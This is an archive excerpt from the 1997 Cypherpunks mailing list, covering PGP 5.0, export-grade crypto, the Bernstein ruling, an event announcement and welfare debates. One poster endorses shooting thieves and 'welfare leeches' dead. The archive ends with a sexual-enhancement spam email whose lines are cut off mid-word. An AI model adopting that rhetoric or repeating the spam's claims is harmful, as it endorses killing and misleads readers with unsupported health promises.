Formosa}) Date: Tue, 26 Aug 1997 05:06:31 -0700 (PDT) Subject: heart In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 25 Aug 1997, Ray Arachelian wrote: > On Mon, 25 Aug 1997, ? the platypus {aka David Formosa} wrote: [...Realy lame aregument on my part snipped...] What was I on when I wrote that crap!? But I have a better example :D I take a blood sample from our plunger wealding cop, its the blood of a homospapian i.e. a human. The cop makes use of the plunger. I take a second sample from our plunger wealding cop, its the blood of a homospapain i.e. a human. The cop can't become inhuman by any action thay take. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNAKL9aQK0ynCmdStAQGNrAQA3tOnIsH1VBhvnNg5BKNJIsv/1a5pKlr+ FNZAV2KNvjfzT9gSVwhw6nJ30f91mtcQbvy09jwn3bDSUoIgY17u/lN7r6RT28FR pCB9fJ96XwGIRuqTI387EFN0dFjNrK+ICQ8NgwkY+4V4zTq6GFalwuAAObWnNX3i czNf/yFFS4A= =MUet -----END PGP SIGNATURE----- From nospam-seesignature at ceddec.com Mon Aug 25 14:08:33 1997 From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com) Date: Tue, 26 Aug 1997 05:08:33 +0800 Subject: Why Not to use PGP 5.0 In-Reply-To: <199708250009.UAA02186@yakko.cs.wmich.edu> Message-ID: <97Aug25.165530edt.32257@brickwall.ceddec.com> On Sun, 24 Aug 1997, Damaged Justice wrote: > > http://www.shub-internet.org/why_not_pgp_5.html > It sounds like a collection of gripes, some apply to the unix, but if that works, it talks about the windows or mac version. Some thoughts: 1-5 The scanned source generates RSA keys. The old version generates RSA keys so keep it around. 8-10 - then I am currently doing the impossible... If they released it as a "non-beta", the gripe would be that they should have kept it beta until the very last problem is fixed. 11 - I linked with rsaref on both an intel and alpha linux. Lazyness or stupidity on the part of the user is not a problem with PGP. And where do you get a commercial unix version of 2.6.2? Or even the freeware - if they aren't going to bother with RSAref with 5.0, they won't with 2.6. And with RSAref properly configured, RSA keysize is limited. 12 - I found one problem with the alpha, and it was trivial to fix. 25 - /dev/random or other generation methods. I notice that pgpv hangs if there is no randseed.bin until I hit a few keys (it needs to be /dev/urandom in many cases). When the system has a random number generator, why do your own? 26 - There is no problem with DH the way PGP is using it. There are also attacks against RSA, which PGP tries to avoid. If you have found a real problem, identify it, otherwise you can worry as much about RSA as DH Also, it will accept RSA/SHA1, but won't generate them because - horrors - that would not be compatible with the older versions and there would be more gripes because of that. 28 - they have -c in the unix version. It only does 2.6 compatible encryption. 16 - They don't document the hkp, but it seems to be just the response to the form of a standard keyserver, so my http style scripts work. All keyservers still used that wierd port number, so everyone had to enable it in their firewalls. Some comments with merit: Keyservers - if pgp.com has a working one for 5.0, they should propogate the source. Options - There are entries to change the conventional cipher and hash, but these are ignored. pgpv accepts all, but pgpe cannot generate all, but many of these are to be "standard" or backward compatible, and that would cause more gripes. And if an option was not fully tested, or available in all versions, it would be good for another gripe point. But the source is available. If you don't like something, then fix it instead of complaining. --- reply to tzeruch - at - ceddec - dot - com --- From dformosa at st.nepean.uws.edu.au Tue Aug 26 05:10:33 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Tue, 26 Aug 1997 05:10:33 -0700 (PDT) Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708252218.RAA03502@mailhub.amaranth.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 25 Aug 1997, William H. Geiger III wrote: > In , on 08/26/97 > at 02:42 AM, ? the Platypus {aka David Formosa} > said: [...] > >No I mean what I said, resurch indercates that welfare is > >cheeper then law enforcement and securaty for equile amounts of reduction > >in crimes. > > Bullshit. The majority on increased crime from the Welfare leaches could > be handled with a $200 shotgun and a $0.50 Deer Slug. Of cause what a great soltion. You stole from me. *BANG* You raped my sister *BANG* You smuggeled drugs. *BANG* You smuggled crypo. *BANG* You have political views that are diffrent to mine *BANG* *BANG* *BANG* - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNAKM46QK0ynCmdStAQEwSQP/eTbrAcXWcdcxj+hDP4HTUdCN/PyA0CGZ ZgdsCAEXbuuP9Ic9wwnBrf0dUXRF40MToNVo+Oy/a/07YB1jGlCt5q9jx/IRCQiW hk5NtrXe2iTvrkU2wl/XpT7GxHrxv0vCPmQCN2G5jIaC+GCcF6/nw8nKgDMIvqHa 7Tc4RPzR4w4= =L2tY -----END PGP SIGNATURE----- From jrennie at hardy.ocs.mq.edu.au Tue Aug 26 05:16:44 1997 From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE) Date: Tue, 26 Aug 1997 05:16:44 -0700 (PDT) Subject: Netscape Crypto Message-ID: Does anybody know how strong the export netscape crypto stuff is ?? Is the stuff only 40 bit crypto for export ?? A friend asked me about the secure credit stuff and if netscape was secure for credit cards ?? So is the export copy secure ?? I presuem the non-export wouldn't be to bad. Jason From adam at homeport.org Mon Aug 25 14:21:53 1997 From: adam at homeport.org (Adam Shostack) Date: Tue, 26 Aug 1997 05:21:53 +0800 Subject: Mathematics > NSA + GCHQ In-Reply-To: <3.0.2.32.19970825090759.007087d0@netcom10.netcom.com> Message-ID: <199708252059.QAA18648@homeport.org> Lucky Green wrote: | I am sure the university will make an exception to the rule once a $1M | check for the regents arrives. The Internet idealists are your base for any | distributed crack. But the cracks that come next are too complex to be | performed by just your base. As in an election, you have to reach beyond | your base to win. The students can show their solidarity. It will require | tempting cash offers before large scale distributed cracks can suck cycles | from the millions of computers in other environments. Large numbers of small wins may be more likely to draw in cycles than single large prizes. This is because as a small player I'll go after the $100 prize that I can win daily over the $1M prize that I can win yearly. The odds against the $1M prize are too high. There were two companies at Crypto talking about this sort of business model, software to ship by year end. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dformosa at st.nepean.uws.edu.au Mon Aug 25 14:22:19 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Tue, 26 Aug 1997 05:22:19 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 24 Aug 1997, Jenaer Mixmaster Anonserver wrote: [...] > Uh, don't you mean "instead of paying a large amount of money to the > government and a small amount of money for a security system, you now > just pay a small amount of money for the security system"? No I mean what I said, resurch indercates that welfare is cheeper then law enforcement and securaty for equile amounts of reduction in crimes. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNAG1+aQK0ynCmdStAQHbdAQAs+FjGHCvbU1co8k+3mro9A0ZA0PzGpDZ uLRASiSWVN5cN8A8/OkrSQXEZBSXfctlAxeEXWthnMkf0+OxnS8+zKfkiJRtotyz RZwsclFRICw/tsak2af73Ahijbmt44Wsc3fZ/BB1IHYfhftx9fg+jnqx5VxsyXT5 cJhrAl6P3W8= =dzpn -----END PGP SIGNATURE----- From tcmay at got.net Mon Aug 25 14:30:50 1997 From: tcmay at got.net (Tim May) Date: Tue, 26 Aug 1997 05:30:50 +0800 Subject: heart In-Reply-To: <199708211706.TAA00218@xs1.xs4all.nl> Message-ID: Thanks, Duncan. I couldn't have (or wouldn't have) said it better myself. A few words on "helping" others: At 12:52 PM -0700 8/25/97, Duncan Frissell wrote: >Tim has never said that he was interested in robbing, ruling, or killing >others apropos of nothing -- something governments do every day. Tim has >merely said that he reserves the right to use deadly force to defend himself >and that he was not interested in helping other people just because they >"need" his help. He didn't say he *wouldn't* help. He just said he does not >believe he is *required* to care or *required* to help. That is a morally >superior position compared to those who insist on helping others at the point >of a gun. And I think that most of what passes for "help" actually does more harm than good, at least in the longterm. For example, sending food aid to Third World countries sounds noble and good. But most studies show the real effect of such aid: it destroys the local infrastructure of food production and distribution. (Imagine being a poor Somali farmer bringing your grain to market, and seeing tons of U.S. grain being distributed freely...it wipes that farmer out, and his future years of production are gone, even after the U.S. food aid is also gone.) For example, the welfare system. Who can argue that it produces persons unable or unwilling to take the available jobs, mostly at or near minimum wage? When a welfare mother of two or more children can collect the total equivalent (direct payments, food coupons, tax exemptions, day care) of $15 an hour, it would be foolish for her to apply for a job at Burger King for $6.35 an hour, and then have to pay almost that amount to put her kids in some day care center. The longer she is out of the job market, the worse it gets. For example, saving people from their bad choices in life. When we force insurers to cover those who do stupid, formerly uninsurable things, or when we force the providers of legally and freely-chose substances (tobacco, hamburger, guns, breast implants, rock climbing equipment, etc.) to pay for the stupid actions of others, even if only imagined, costs rise and choices narrow. (Off the main subject, but I think it reprehensible that states are suing to collect _medical_ costs associated with tobacco. The costs are between the insurers and the customers, not third parties. The principle, if carried through, would make McDonald's liable for obesity and nutrition problems, heart disease, etc. And it would make Nintendo liable for education cost overruns, etc. Fact is, if Alice smokes three packs a day, and Mississsippi is stupid enough to give her free health care, or to charge premiums not reflecting her smoking, this is that state's problem, not R.J, Reynolds' problem! Same goes for breast implants. No evidence shows silicone is actually harmful, just a bunch of junk science show trials. Any woman who got her tits inflated for vanity reasons deserves whatever happens, in any case. So now Dow Corning will drop out of the implant business, and women truly in need of them for mastectomy sorts of reasons will find there is no supplier...except maybe in Mexico or Denmark, where "regulatory arbitrage" applies.) We have become what the Founders feared. (Somebody said this a few days ago. I think it's a great slogan, and I may add it to my .sig file.() --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dformosa at st.nepean.uws.edu.au Mon Aug 25 14:32:55 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Tue, 26 Aug 1997 05:32:55 +0800 Subject: Welfare Solution #389 In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 25 Aug 1997, Ray Arachelian wrote: [...] > Want to end the drug problem? Sell the drugs dirt cheap. Treat driving > while high the same as driving while drunk. Of cause such actions should be done within the context of a harm minimlisation scheme (needle echanged ect) - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNAG4/6QK0ynCmdStAQH4GAP/fV+xS6qODPeEYFVWScSaDCcc3n9e/B2M F2K8vE9JTsgm1W8Ul/FnzIxGwpCo7PGM8QdQWfouAoF2AtdnKdFWPfsWAnE8/oHx uGzJNPkmRqRZii/cfXSRI+NBAO6SUyICxZQ9PClNhCGdBvEqzLY1KWK8GYhxysNN 4uFtGymnSuc= =PiYB -----END PGP SIGNATURE----- From whgiii at amaranth.com Tue Aug 26 05:39:05 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 26 Aug 1997 05:39:05 -0700 (PDT) Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: Message-ID: <199708261244.HAA11451@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In , on 08/26/97 at 05:59 PM, ? the Platypus {aka David Formosa} said: >-----BEGIN PGP SIGNED MESSAGE----- >On Mon, 25 Aug 1997, William H. Geiger III wrote: >> In , on 08/26/97 >> at 02:42 AM, ? the Platypus {aka David Formosa} >> said: >[...] >> >No I mean what I said, resurch indercates that welfare is >> >cheeper then law enforcement and securaty for equile amounts of reduction >> >in crimes. >> >> Bullshit. The majority on increased crime from the Welfare leaches could >> be handled with a $200 shotgun and a $0.50 Deer Slug. >Of cause what a great soltion. >You stole from me. >*BANG* yep >You raped my sister >*BANG* yep >You smuggeled drugs. >*BANG* Nope >You smuggled crypo. >*BANG* Nope >You have political views that are diffrent to mine >*BANG* >*BANG* >*BANG* Nope As is the first two cases the "criminal" has violated my property & family. Such crimes are worthy of immediate death. You steal, you assault or threaten me or my family you have committed suicide. It is a quite simple and effective philosophy: "You fuck with me, my family, or my property you die. You leave me alone and I leave you alone." Even someone like you can understand such a philosophy. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNALBpI9Co1n+aLhhAQETSgP/dEQCgZy1ldjrExbJ+AnKLiwua96tamdE mbRuDe7R0kWFKQwy2BxpzD15J2RWb5tHFxz2sapYHkjrjh2HpY742mHuEwY8Cu38 vrr3eYoD5lqDwpokMqZpHpJp2jgX1MzE+4CNwpX+4cpiO0o+d7fdLcBhZB49hpHU 6eZ8y3TnDpA= =YHXL -----END PGP SIGNATURE----- From whgiii at amaranth.com Tue Aug 26 05:42:26 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 26 Aug 1997 05:42:26 -0700 (PDT) Subject: Netscape Crypto In-Reply-To: Message-ID: <199708261247.HAA11489@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In , on 08/26/97 at 10:16 PM, Jason William RENNIE said: >Does anybody know how strong the export netscape crypto stuff is ?? >Is the stuff only 40 bit crypto for export ?? >A friend asked me about the secure credit stuff and if netscape was >secure for credit cards ?? >So is the export copy secure ?? I presuem the non-export wouldn't be to >bad. They are both crap. Never trust a company that will not release their source code. BTW those cute little Verisign certs, well Verisign collects the info you use to fill those out and resells them. Yes this is a company I would trust. Honest :) - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNALCaY9Co1n+aLhhAQEIrwQAml4qgc73JVZYNYliIq0LrkpWbKLMxR39 +BIvXXBjOLtpLc8LztFDIhA5Kui+jmYxmbSSHrGL13WlxC65YTzUnmvo7A6swlKt HykX5Ff7ZcR80EM2Miniw4+S2uPOhiU1CpvJzE1R4sQsgfX3SdfjMGyL+ZvYvfHR h58+wzxoxcw= =rbV0 -----END PGP SIGNATURE----- From jya at pipeline.com Tue Aug 26 05:48:58 1997 From: jya at pipeline.com (John Young) Date: Tue, 26 Aug 1997 05:48:58 -0700 (PDT) Subject: Reuter on Bernstein Ruling Message-ID: <1.5.4.32.19970826124158.006d5e64@pop.pipeline.com> http://www.cnn.com, CNN Online, 26 August 1997: Encryption rules rejected Judge says federal regulations barring unlicensed exports unconstitutional San Francisco, Aug 25 (Reuter) - U.S. government regulations on the export of encryption software are unconstitutional, a federal judge ruled on Monday. U.S. District Judge Marilyn Hall Patel said licensing requirements for the export of encryption software and related devices were an unconstitutional prior restraint on First Amendment free speech rights. Patel also issued a permanent injunction barring the government from enforcing the regulations against plaintiff Daniel Bernstein or anyone who sought to use, discuss or publish his encryption program. Encryption involves running a readable message though a computer program that translates the message according to an equation or algorithm into unreadable "ciphertext." "By the very terms of the encryption regulations, the most common expressive activities of scholars -- teaching a class, publishing their ideas, speaking at conferences, or writing to colleagues over the Internet -- are subject to a prior restraint by the export controls ...," Patel wrote in a 32-page ruling released in San Francisco. Patel said that, having found the regulations to be invalid, she could have issued a nationwide injunction barring their enforcement. But she said she had kept the injunction as narrow as possible pending appeal because "the legal questions at issue are novel, complex and of public importance." The ruling is important because the computer industry sees use of encryption technology across country borders as essential for advancing electronic commerce and private communications over the Internet. The government has previously cited national security concerns over the export of encryption programs. As a graduate student, Bernstein developed an encryption algorithm he called "Snuffle." In 1992, Bernstein asked the State Department whether Snuffle was controlled by export regulations then in force which classified cryptographic software as "defense articles." The government told him his program was subject to licensing by the Department of State prior to export. Alleging that he was not free to teach, publish or discuss with other scientists his theories on cryptography embodied in the Snuffle program, Berstein sued the State Department in 1995, challenging the regulations on free speech grounds. Bernstein is now a research assistant professor of mathematics, statistics and computer science at the University of Illinois at Chicago. Patel ruled last December that the old regulations limiting the export of encryption software violated the First Amendment. But late last year, President Bill Clinton issued an executive order transfering jurisdiction over the export of nonmilitary encryption products to the Commerce Department. Patel's latest ruling was on Bernstein's amended lawsuit which included the new regulations and new defendants. Patel said that her finding that encryption source code was speech protected by the First Amendment did not remove encryption technology from all government regulation. Cindy Cohn, a lawyer for Bernstein, called the ruling a "very big victory" for free speech advocates. "This brings us a step closer to people being able to freely publish ideas about encryption," she said. A U.S. Justice Department lawyer who defended the regulations could not immediately be reached for comment. The government could appeal the ruling. [End] From jya at pipeline.com Mon Aug 25 14:58:20 1997 From: jya at pipeline.com (John Young) Date: Tue, 26 Aug 1997 05:58:20 +0800 Subject: BXA Meet in Portland OR Message-ID: <1.5.4.32.19970825212627.008485c0@pop.pipeline.com> Lee Tien wrote: >We discussed the IEEPA issues to some extent in our briefs in Bernstein as >well, in case anyone cares. The gov't also discussed them, opposing our >position. I don't keep track of which briefs are on the EFF website, but I >assume they're both up now. I'd like to applaud all those who've been working on this legal hack for years now, keeping flatfeet to fire. For mind-opening, hard-headed reading, in addition to Froomkin and Bernstein, see the briefs on Karn and Junger, see Gilmore's files, study all the crypto sites which show the depth of research that has often had to be ripped out of the government'g tight paws still fiercely resisting loss of control over "the national interest." Tim's "crazy man" threat, artfully delineated in his CA Manifesto and Cyphernomicon, who might just do what "rational minds" won't, is also to be admired for reminding the insiders that not everyone abides the rules of the court when they are not wisely applied for this time and these newly divergent, even anarchic, interests. Read Tim for inspiration when the briefs numb, then go back and study the briefs some more, and you'll see that they don't read the same, there's more fire there than appears at first glance, then return to Tim and see that, well, god damn, so that's what he's saying and we've not been really hearing. Shit, he's crazier, the briefs are crazier, the government's crazier than rational minds can bear to believe. When you can't take them any more, read Duncan Frissell, and freak with terrible understanding that the world you've long thought solid and, forever around to complain about and blame, may be crumbling, that we're going to be wholly on our own to fight the monsters. Beware, though, you may suddenly want the gov to endure. Too late, the angry power-infected lab rats are loose, AP bent. From rah at shipwright.com Mon Aug 25 14:59:30 1997 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Aug 1997 05:59:30 +0800 Subject: DCSB: Elliptic Curve Cryptography and Digital Commerce Message-ID: --- begin forwarded text X-Sender: rah at mail.shipwright.com Mime-Version: 1.0 Date: Mon, 25 Aug 1997 12:13:49 -0400 To: dcsb at ai.mit.edu, dcsb-announce at ai.mit.edu From: Robert Hettinga Subject: DCSB: Elliptic Curve Cryptography and Digital Commerce Sender: bounce-dcsb at ai.mit.edu Precedence: bulk Reply-To: Robert Hettinga -----BEGIN PGP SIGNED MESSAGE----- The Digital Commerce Society of Boston Presents Dr. Christof Paar Cryptography and Data Security Group, Worcester Polytechnic Institute Elliptic Curve Cryptography and Digital Commerce Tuesday, September 2, 1997 12 - 2 PM The Downtown Harvard Club of Boston One Federal Street, Boston, MA Elliptic Curve (EC) public-key cryptosystems have matured from an area of mainly theoretical interest to a highly practical security tool. EC are a general-purpose public-key scheme which can provide tasks such as digital signature, key establishment, and encryption. EC are extremely attractive because the required operand length is dramatically reduced compared to RSA and DSA-type algorithms: The security of an RSA system with 1024 bits corresponds to the security of an EC system with only 160 bits. This can result in considerably faster processing times, e.g., for digital signature verification, and shorter certificates. One application area of special interest are smart cards. This talk will give a brief, non-technical introduction to EC system. Current security estimations relatively to RSA will be provided. We will talk about performance and the adoption of EC systems in standard bodies. Christof Paar leads the Cryptography and Data Security group in the ECE department of Worcester Polytechnic Institute. Dr. Paar's research interests include security issues in wireless and ATM networks, smart cards, efficient implementation of elliptic and hyperelliptic curve public-key algorithms, and hardware implementation of cryptosystems. Dr. Christof Paar received a BSEE degree from the Technical College of Cologne, Germany. He obtained an MSEE degree from the University of Siegen, Germany, and did graduate research at Michigan Technological University. From 1991-1994 he worked as research fellow at the Institute for Experimental Mathematics in Essen, Germany, from where he received a Ph.D. in Electrical Engineering. In 1993 and '94 he spent time as a visiting researcher at the University of Massachusetts at Amherst. This meeting of the Digital Commerce Society of Boston will be held on Tuesday, September 2, 1997, from 12pm - 2pm at the Downtown Branch of the Harvard Club of Boston, on One Federal Street. The price for lunch is $30.00. This price includes lunch, room rental, various A/V hardware, and the speaker's lunch. ;-). The Harvard Club *does* have dress code: jackets and ties for men (and no sneakers or jeans), and "appropriate business attire" (whatever that means), for women. Fair warning: since we purchase these luncheons in advance, we will be unable to refund the price of your lunch if the Club finds you in violation of the dress code. We will attempt to record this meeting and put it on the web in RealAudio format at some future date We need to receive a company check, or money order, (or, if we *really* know you, a personal check) payable to "The Harvard Club of Boston", by Saturday, August 30, or you won't be on the list for lunch. Checks payable to anyone else but The Harvard Club of Boston will have to be sent back. Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they *must* be made payable to "The Harvard Club of Boston", in the amount of $30.00. If anyone has questions, or has a problem with these arrangements (We've had to work with glacial A/P departments more than once, for instance), please let us know via e-mail, and we'll see if we can work something out. Upcoming speakers for DCSB are: October Peter Cassidy Military Fiat and Digital Commerce November Carl Ellison Identity and Certification for Electronic Commerce December James O'Toole Internet Coupons January Joseph Reagle "Social Protocols": Meta-data and Negotiation in Digital Commerce We are actively searching for future speakers. If you are in Boston on the first Tuesday of the month, and you would like to make a presentation to the Society, please send e-mail to the DCSB Program Commmittee, care of Robert Hettinga, . For more information about the Digital Commerce Society of Boston, send "info dcsb" in the body of a message to . If you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a message to . We look forward to seeing you there! Cheers, Robert Hettinga Moderator, The Digital Commerce Society of Boston -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBNAGu58UCGwxmWcHhAQEnOAf+IpalsvwPN7bLj4/kVWMQ6MkTFlYEsh5N twWf89hiiSVWlalPuWXmlVbu3AkwBc3oIzde3ZKg0ujlwa9Va0TDquPYhm6B4LvB pKqX9AqHortwmxKSBpesXoxGmhetIQLGrgP2nbiSCpr6g6B4OilHrBJJ0dGL1/XN M5Ca+O76cL/bUcdDIeuYASzk+DI2hCaub9Ir+WpXLXEoTqEFm4PrLI9uC9NlgUHs umBiAnOzGvLvUho0/VQQ0MX9QYGc1t72l+DrFkhmnkj9FSpLgOExwF8GkeJJ6S7I MNgayKwqQU/GKgjpG7UZKxNdIWWty98V44yuuelO62hZb2mtO8c7Ag== =eybl -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ For help on using this list (especially unsubscribing), send a message to "dcsb-request at ai.mit.edu" with one line of text: "help". --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From gnu at toad.com Tue Aug 26 06:12:48 1997 From: gnu at toad.com (John Gilmore) Date: Tue, 26 Aug 1997 06:12:48 -0700 (PDT) Subject: Bernstein decision is out! Message-ID: <199708261312.GAA02742@toad.com> Judge Patel has made her decision, and it is up on the Web at http://www.eff.org/. We're still preparing the legal analysis, but the basic outline is that she declares the Commerce Dept. export-control scheme unconstitutional. She also issued an injunction against the Commerce Dept. preventing them from enforcing these regulations against Prof. Bernstein or others who distribute his software. More details later... John Gilmore From blancw at cnw.com Mon Aug 25 15:22:42 1997 From: blancw at cnw.com (Blanc) Date: Tue, 26 Aug 1997 06:22:42 +0800 Subject: Welfare / Norplant Message-ID: <3.0.32.19970825150223.00a5713c@cnw.com> Peter Trei wrote: >This scheme: [...] >* Targets young women who would be likely to become 'welfare > mothers'. The parents of such young women would be highly > motivated to have their dependent daughters participate. ................................................... Perhaps so. But it reminds me of a statement I heard in the movie "The Last of the Mohicans": "Sir, I would rather be guilty of the most grievous error of judgement, than forfeit authority over my decisions." I don't think it wise to encourage young women to allow themselves to be swayed to move in directions which others prepare for them. It would be of greater benefit - to them primarily and secondarily to their community - that they be instructed on matters of Life in the Real World, and on the manner of strengthening their resolve against any kind of external persuasions. This would include the sexual advances of males who have no plans to deal with the consequences of their impregnations. .. Blanc From 68525898 at aol.com Tue Aug 26 06:25:34 1997 From: 68525898 at aol.com (68525898 at aol.com) Date: Tue, 26 Aug 1997 06:25:34 -0700 (PDT) Subject: Are You A Great Lover? Message-ID: <515329648628.gfd78551@blk106.com> WARNING: THIS E-MAIL CONTAINS EXPLICIT DETAILS ABOUT HOW TO DRAMATICALLY IMPROVE MALE SEXUAL ENJOYMENT AND PERFORMANCE. SINCE OUR INTENT IS NOT TO OFFEND, WE RECOMMEND THAT YOU CONTINUE TO READ ONLY IF YOU ARE SINCERELY INTERESTED IN THE FOLLOWING: MAXIMIZING YOUR SEXUAL PLEASURE. IMPROVING YOUR SEXUAL PERFORMANCE AND ENDURANCE. SATISFYING YOUR PARTNER AS THEY HAVE NEVER BEEN SATISFIED. Dear Friend, Are you a skilled lover? Do you sometimes wonder if your sexual partner is truly pleased with your lovemaking skills? Do you realize that it is possible to experience a level of sexual performance and enjoyment that most men might not even believe is possible? In this E-mail, I'm going to tell you how. I'll give you an overview of the latest scientific information in the area of sexual performance and what it means to you. I'm going to make these assumptions: 1) You are no longer eighteen years old. 2) You do not have any serious physical conditions that inhibit your sex life. 3) You are interested in maximizing your (and your partner's) sexual pleasure. Who am I? My name is Robert Irwin. I am a sexual therapist, researcher and the current Executive Director of the Sexual Performance Institute (S.P.I.). Over the past eight years, I have traveled across the United States, Canada and the Caribbean presenting S.P.I seminars, titled, SEXUAL MASTERY. These seminars present the most recent scientific data regarding male sexual performance and teach men the most effective sexual performance techniques. Night after night, I have been able to demonstrate that apparently-ordinary men can learn how to become Sexual Superstars, given proper information, techniques and a little practice. What are the most important things you should know about male sexual performance? 1) Sexual ability is not something you inherit (and must settle for); it is a set of skills that can be developed. 2) You can accomplish things in bed that most men don't dream are possible. In the next few minutes, I am going to make you aware of the latest clinical understanding what is truly possible for you in the area of sexual performance. This information is based upon the latest scientific research; more importantly,it has been proven true by myself and thousands of satisfied S.P.I. seminar graduates. For just a few minutes, I'll ask you to keep an open mind and think about how this information might turbo-charge your love life! In our SEXUAL MASTERY seminars, we refer to the men that become very proficient in the area of sexual performance as " What is possible for you, as a "Sexual Master"? You can maintain a rock-hard erection... for as long as you desire. No matter how hot or exciting the situation (or position) you might be in, you can be in complete control of the exact moment of your climaxes. If you want, you can bring your partn This ability can give you tremendous confidence. Imagine... never again apologizing to your partner for coming too soon! With a better understanding of how your erection and orgasm processes work, you can learn to maintain an erection...indefinitely! Frankly, there are some muscle exercises involved in mastering this ability. But they are non-stressful exercises that can be done anywhere, in just a few minutes per day. How much more confident would you be, sexually, if you knew that you were in total control of the duration of your erections? Even more impressively, you can develop the ability to be multi-orgasmic. Although this ability is generally accepted in women, very few men have mastered the physical and mental skills necessary to be "multi-orgasmic". What does it mean to be a multi-orgasmic male? Clinically, it is the ability to have two or more orgasms, in rapid succession, without the need for an extended rest (refractory) period between orgasms. It is possible to minimize the length of your refractory periods and some Masters are capable of achieving between three and six full-ejaculatory orgasms, within several hours. Do you remember how wonderful it was, when you were younger, to be able to have multiple orgasms in a very short period of time? Have you ever had the incredible occurrence of multiple orgasms, without losing your erection? There is no reason that you can't still experience these things. Why should women have all the fun? Physically (or scientifically), there is no reason that you can't experience many orgasms in a very short period of time. It is simply a matter of conditioning. And, even if you are a "couch potato," you will be very capable of doing the conditioning exercises necessary to allow you to become completely multi-orgasmic. Can you imagine your partner's delight, when you are able to keep up with her...climax for climax? You can learn the many benefits of non-ejaculatory orgasms. This skill really is the "best of all worlds." Did you know it was possible to orgasm without ejaculating? As you may remember from your pre-puberty days, orgasm and ejaculation are two dif With some concentration and practice, you can learn to keep them separate. Why would you want to do this? Some men consider it the "next" level of sex. Men that are familiar with these amazingly pleasurable experiences describe them as more intense than the ordinary (ejaculatory) variety, plus... they have the tremendous bonus of allowing you to have many consecutive orgasms with no (zero) loss of erection! This sounds like something you might like to try, doesn't it? What could be better than complete control over your climaxes or the ability to have multiple orgasms in a very short period of time? You can increase the intensity and duration of your ejaculation. Think of how much of your life is dedicated to achieving an orgasm. It is one of the most powerful pleasures available to mankind. Although, in most men, their orgasms last no more tha With practice and patience, some Masters have learned to extend their orgasms, from an extra 10 or 20 seconds...to almost half an hour! Can you think of a more direct way to increase your sexual pleasure? Whether you are by yourself or with a 